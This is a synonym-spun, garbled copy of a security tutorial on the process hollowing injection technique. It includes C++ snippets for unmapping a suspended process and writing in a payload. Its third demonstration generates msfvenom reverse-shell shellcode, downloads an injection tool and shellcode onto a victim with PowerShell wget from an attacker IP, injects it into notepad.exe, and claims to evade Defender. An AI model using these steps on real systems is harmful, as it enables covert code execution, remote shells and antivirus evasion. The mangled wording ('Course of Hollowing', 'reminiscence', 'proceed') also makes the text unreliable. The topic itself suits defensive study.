Introduction
In July 2011, John Leitch of autosectools.com talked a few method he known as course of hollowing in his whitepaper right here. Ever since then, many malware campaigns like Bandook and Ransom.Cryak, and varied APTs have utilized Course of Hollowing for protection evasion and privilege escalation. On this article, we intention to debate the technical ideas utilized behind the method in a straightforward to understand method and display a able to go software that may carry out Course of Hollowing in a conveyable method.
MITRE TACTIC: Protection Evasion (TA0005) and Privilege Escalation (TA0004)
MITRE Method ID: Course of Injection (T1055)
MITRE SUB ID: Course of Hollowing (T1055.012)
Desk of content material
- Pre-Requisites
- Course of Hollowing
- Demonstration 1: PoC
- Demonstration 2: PoC
- Demonstration 3: Actual Time Exploit
- Conclusion
Pre-Requisites
One should concentrate on the next necessities with a purpose to absolutely perceive the method mentioned:
- C/C++/C# with Win32 API coding
- Registers, PEB, Reminiscence administration in Home windows OS
- Debugging code
Course of Hollowing
Elementary idea is sort of simple. Within the course of hollowing code injection method, an attacker creates a brand new course of in a suspended state, its picture is then unmapped (hollowed) from the reminiscence, a malicious binary will get written as a substitute and eventually, this system state is resumed which executes the injected code. Workflow of the method is:
Step 1: Creating a brand new course of in a suspended state:
- CreateProcessA() with CREATE_SUSPENDED flag set
Step 2: Swap out its reminiscence contents (unmapping/hollowing):
Step 3: Enter malicious payload on this unmapped area:
- VirtualAllocEx : To allocate new reminiscence
- WriteProcessMemory() : To write down every of malware sections to focus on the method house
Step 4: Setting EAX to the entrypoint:
Step 5: Begin the suspended thread:
Programmatically talking, within the unique code, the next code was used to display the identical which is defined beneath
Step 1: Creating a brand new course of
An adversary first creates a brand new course of. To create a benign course of in suspended mode the features are used:
- CreateProcessA() and flag CREATE_SUSPENDED
Following code, snippet is taken from the unique supply right here. An evidence is as follows:
- pStartupInfo is the pointer to the STARTUPINFO construction which specifies the looks of the window at creation time
- pProcessInfo is the pointer to the PROCESS_INFORMATION construction that incorporates particulars a few course of and its fundamental thread. It returns a deal with known as hProcess which can be utilized to switch the reminiscence house of the method created.
- These two pointers are required by CreateProcessA perform to create a brand new course of.
- CreateProcessA creates a brand new course of and its major thread and inputs varied totally different flags. One such flag being the CREATE_SUSPENDED. This creates a course of in a suspended state. For extra particulars on this construction, refer right here.
- If the method creation fails, perform returns 0.
- Lastly, if the pProcessInfo pointer doesn’t return a deal with, means the method hasn’t been created and the code ends.
printf("Creating processrn");
LPSTARTUPINFOA pStartupInfo = new STARTUPINFOA();
LPPROCESS_INFORMATION pProcessInfo = new PROCESS_INFORMATION();
CreateProcessA
(
0,
pDestCmdLine,
0,
0,
0,
CREATE_SUSPENDED,
0,
0,
pStartupInfo,
pProcessInfo
);
if (!pProcessInfo->hProcess)
{
printf("Error creating processrn");
return;
}
Step 2: Data Gathering
- Learn the bottom handle of the created course of
Now we have to know the bottom handle of the created course of in order that we are able to use this to repeat this reminiscence block to the created course of’ reminiscence block later. This may be carried out utilizing:
NtQueryProcessInformation + ReadProcessMemory
Additionally, might be carried out simply utilizing a single perform:
ReadRemotePEB(pProcessInfo->hProcess) PPEB pPEB = ReadRemotePEB(pProcessInfo->hProcess);
- Learn the NT Headers format (from the PE construction) from the PEB’s picture handle.
That is important because it incorporates info associated to OS which is required in additional code. This may be carried out utilizing ReadRemoteImage(). pImage is a pointer to hProcess deal with and ImageBaseAddress.
PLOADED_IMAGE pImage = ReadRemoteImage ( pProcessInfo->hProcess, pPEB->ImageBaseAddress );
Step 3: Unmapping (hollowing) and swapping the reminiscence contents
After acquiring the NT headers, we are able to unmap the picture from reminiscence.
- Get a deal with of NTDLL, a file containing Home windows Kernel Features
- HMODULE obtains a deal with hNTDLL that factors to NTDLL’s base handle utilizing GetModuleHandleA()
- GetProcAddress() takes enter of NTDLL
- deal with to ntdll that incorporates the “NtUnmapViewOfSection” variable identify saved within the specified DLL
- Create NtUnmapViewOfSection variable which carves out course of from the reminiscence
printf("Unmapping vacation spot sectionrn");
HMODULE hNTDLL = GetModuleHandleA("ntdll");
FARPROC fpNtUnmapViewOfSection = GetProcAddress
(
hNTDLL,
"NtUnmapViewOfSection"
);
_NtUnmapViewOfSection NtUnmapViewOfSection =
(_NtUnmapViewOfSection)fpNtUnmapViewOfSection;
DWORD dwResult = NtUnmapViewOfSection
(
pProcessInfo->hProcess,
pPEB->ImageBaseAddress
);
Now we now have to map a brand new block of reminiscence for supply picture. Right here, a malware could be copied to a brand new block of reminiscence. For this we have to present:
- A deal with to course of,
- Base handle,
- Dimension of the picture,
- Allocation type-> right here, MEM_COMMIT | MEM_RESERVE means we demanded and reserved a selected contiguous block of reminiscence pages
- Reminiscence safety fixed. Learn right here. PAGE_EXECUTE_READWRITE -> permits RWX on the dedicated reminiscence block.
PVOID pRemoteImage = VirtualAllocEx ( pProcessInfo->hProcess, pPEB->ImageBaseAddress, pSourceHeaders->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
Step 4: Copy this new block of reminiscence (malware) to the suspended course of reminiscence
Right here, part by part, our new block of reminiscence (pSectionDestination) is being copied to the method reminiscence’s (pSourceImage) digital handle
for (DWORD x = 0; x < pSourceImage->NumberOfSections; x++)
{
if (!pSourceImage->Sections[x].PointerToRawData)
proceed;
PVOID pSectionDestination = (PVOID)((DWORD)pPEB->ImageBaseAddress + pSourceImage->Sections[x].VirtualAddress);
}
Step 5: Rebasing the supply picture
For the reason that supply picture was loaded to a unique ImageBaseAddress than the vacation spot course of, it must be rebased to ensure that the binary to resolve addresses of static variables and different absolute addresses correctly. The way in which the home windows loader is aware of how one can patch the pictures in reminiscence is by referring to a relocation desk residing within the binary.
for (DWORD y = 0; y < dwEntryCount; y++)
{
dwOffset += sizeof(BASE_RELOCATION_ENTRY);
if (pBlocks[y].Kind == 0)
proceed;
DWORD dwFieldAddress = pBlockheader->PageAddress + pBlocks[y].Offset;
DWORD dwBuffer = 0;
ReadProcessMemory
(
pProcessInfo->hProcess,
(PVOID)((DWORD)pPEB->ImageBaseAddress + dwFieldAddress),
&dwBuffer,
sizeof(DWORD),
0
);
dwBuffer += dwDelta;
BOOL bSuccess = WriteProcessMemory
(
pProcessInfo->hProcess,
(PVOID)((DWORD)pPEB->ImageBaseAddress + dwFieldAddress),
&dwBuffer,
sizeof(DWORD),
0
);
}
Step 6: Setting EAX to the entrypoint and Resuming Thread
Now, we’ll get the thread context, set EAX to entrypoint utilizing SetThreadContext and resume execution utilizing ResumeThread()
- EAX is a particular function register which shops the return worth of a perform. Code execution begins the place EAX factors.
- The thread context consists of all the knowledge the thread must seamlessly resume execution, together with the thread’s set of CPU registers and stack.
LPCONTEXT pContext = new CONTEXT(); pContext->ContextFlags = CONTEXT_INTEGER; GetThreadContext(pProcessInfo->hThread, pContext) DWORD dwEntrypoint = (DWORD)pPEB->ImageBaseAddress + pSourceHeaders->OptionalHeader.AddressOfEntryPoint; pContext->Eax = dwEntrypoint; //EAX set to the entrypoint SetThreadContext(pProcessInfo->hThread, pContext) ResumeThread(pProcessInfo->hThread) //Thread resumed
Step 7: Changing real course of with customized code
Lastly, we have to go our customized code that’s to get replaced with a real course of. Within the code given by John Leitch, a perform known as CreateHallowedProcess is getting used that encapsulates the entire code we mentioned in step 1 by means of 6 and it takes as an argument the identify of the real course of (right here, svchost) and the trail of the customized code we have to inject (right here, HelloWorld.exe)
pPath[strrchr(pPath, '') - pPath + 1] = 0;
strcat(pPath, "helloworld.exe");
CreateHollowedProcess("svchost",pPath);
Demonstration 1
The official code might be downloaded, and inspected and the EXEs offered might be run utilizing Course of Hollowing. The total code might be downloaded right here. As soon as downloaded, extract and run ProcessHollowing.exe which incorporates the whole code described above. As you’d be capable to see that the file has created a brand new course of and injected HelloWorld.exe in it.
Upon inspecting this in Course of Explorer, we see {that a} new course of spawns svchost, however there isn’t a point out of HelloWorld.exe, which implies the EXE has now been masqueraded.
NOTE: To change this code and inject your personal shell (generated from instruments like msfvenom) might be carried out manually utilizing visible studio and rebuilding the supply code however that’s past the scope of this text.
Demonstration 2
Ryan Reeves created a PoC of the method which might be discovered right here. Partially 1 of the PoC, he has coded a Course of Hollowing exe which incorporates a small PoC code popup that will get injected in a legit explorer.exe course of. It is a standalone EXE and therefore, the hardcoded popup balloon might be changed with msfvenom shellcode to provide a reverse shell to your personal C2 server. It may be run like so and also you’d obtain a small popup:
Upon checking in course of explorer, we see {that a} new explorer.exe course of has been created with the identical specified course of ID indicating that our EXE has been efficiently masqueraded utilizing hollowing method.
Demonstration 3: Actual-Time Exploit
We noticed two PoCs above however the truth is each of those strategies aren’t beginner-friendly and wish coding data to execute the assault in real-time setting. Fortunate for us, in comes ProcessInjection.exe software created by Chirag Savla which takes a uncooked shellcode as enter from a textual content file and injects right into a legit course of as specified by the consumer. It may be downloaded and compiled utilizing Visible Studio for launch (Go to Visible studio->open .sln file->construct for launch)
Now, first, we have to create our shellcode. Right here, I’m making a hexadecimal shellcode for reverse_tcp on CMD
msfvenom -p home windows/x64/shell_reverse_tcp exitfunc=thread LHOST=192.168.0.89 LPORT=1234 -f hex
Now, this together with our ProcessInjection.exe file might be transferred to the sufferer system. Then, use the command to run our shellcode utilizing Course of Hollowing method. Right here,
/t:3 Specified Course of Hollowing
/f Specifies the kind of shellcode. Right here, it’s hexadecimal
/path: Full path of the shellcode to be injected. Right here, identical folder so simply “hex.txt” given
/ppath: Full path of the authentic course of to be spawned
powershell wget 192.168.0.89/ProcessInjection.exe -O ProcessInjection.exe powershell wget 192.168.0.89/hex.txt -O hex.txt ProcessInjection.exe /t:3 /f:hex /path:"hex.txt" /ppath:"c:windowssystem32notepad.exe"
Now, a notepad.exe has been spawned however with our personal shellcode in it and we now have obtained a reverse shell efficiently!!
For our personal curiosity, we checked this in our native host with defender ON and you’ll see that course of hollowing was accomplished!
In course of explorer, we see {that a} new notepad.exe has been spawned with the identical PID as our new course of was created with
And at last, when this was executed, the defender didn’t scan any threats indicating that we had efficiently bypassed the antivirus.
NOTE: Newer variations of Home windows will detect this scan as newer patches forestall the method hollowing method by monitoring unmapped segments in reminiscence.
Conclusion
The article mentioned a course of injection methodology often called Course of Hollowing wherein an attacker is ready to obtain code execution by making a benign new course of in a suspended state, injecting customized malicious code in it after which resuming its execution once more. The article mentioned a number of the unique code as described by John Leitch and the essential breakdown of the code adopted by 3 PoC examples accessible on github. Hope you loved the article. Thanks for studying.
Creator: Harshit Rajpal is an InfoSec researcher and left and proper mind thinker. Contact right here
